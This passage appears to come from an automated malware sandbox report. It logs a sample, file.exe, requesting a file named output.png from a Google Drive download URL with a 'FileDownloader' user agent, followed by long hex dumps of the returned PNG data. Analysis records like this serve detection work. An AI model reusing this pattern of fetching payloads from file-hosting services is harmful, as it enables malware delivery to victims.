                                                                                                                                                                Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                2024-12-12 16:01:18 UTC4859INData Raw: aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 bb 10 1f aa
                                                                                                                                                                Data Ascii: L%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                2024-12-12 16:01:18 UTC1324INData Raw: a2 5c e9 76 bb 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21
                                                                                                                                                                Data Ascii: \vSQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!
                                                                                                                                                                2024-12-12 16:01:18 UTC1390INData Raw: 56 bc b8 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7
                                                                                                                                                                Data Ascii: Vd1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*
                                                                                                                                                                2024-12-12 16:01:18 UTC1390INData Raw: af 62 3d fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22
                                                                                                                                                                Data Ascii: b=v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"
                                                                                                                                                                2024-12-12 16:01:18 UTC1390INData Raw: 83 f8 29 d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c
                                                                                                                                                                Data Ascii: )f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                2024-12-12 16:01:18 UTC1390INData Raw: 63 e6 8b 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32
                                                                                                                                                                Data Ascii: c]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2
                                                                                                                                                                2024-12-12 16:01:18 UTC1390INData Raw: c6 2d df 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7
                                                                                                                                                                Data Ascii: -6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                2024-12-12 16:01:18 UTC1390INData Raw: 00 45 39 d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce
                                                                                                                                                                Data Ascii: E9sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1
                                                                                                                                                                2024-12-12 16:01:18 UTC1390INData Raw: d0 c5 96 ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16
                                                                                                                                                                Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.549707172.217.17.654435576C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:15 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-12 16:01:20 UTC4915INHTTP/1.1 200 OK
                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 156917
                                                                                                                                                                Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                X-GUploader-UploadID: AFiumC4Mc6BXcsOUa6iaeSEjNuP0CESdeLPP5txQdaZk_2-AyVuScSMcs7B4sLGbmQrbwoDeYe0
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:20 GMT
                                                                                                                                                                Expires: Thu, 12 Dec 2024 16:01:20 GMT
                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-12 16:01:20 UTC4915INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
                                                                                                                                                                Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                2024-12-12 16:01:21 UTC4869INData Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2
                                                                                                                                                                Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                2024-12-12 16:01:21 UTC1321INData Raw: a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 f7
                                                                                                                                                                Data Ascii: Q q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
                                                                                                                                                                2024-12-12 16:01:21 UTC1390INData Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6
                                                                                                                                                                Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
                                                                                                                                                                2024-12-12 16:01:21 UTC1390INData Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d
                                                                                                                                                                Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
                                                                                                                                                                2024-12-12 16:01:21 UTC1390INData Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8
                                                                                                                                                                Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                2024-12-12 16:01:21 UTC1390INData Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63
                                                                                                                                                                Data Ascii: ]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2yMc
                                                                                                                                                                2024-12-12 16:01:21 UTC1390INData Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1
                                                                                                                                                                Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
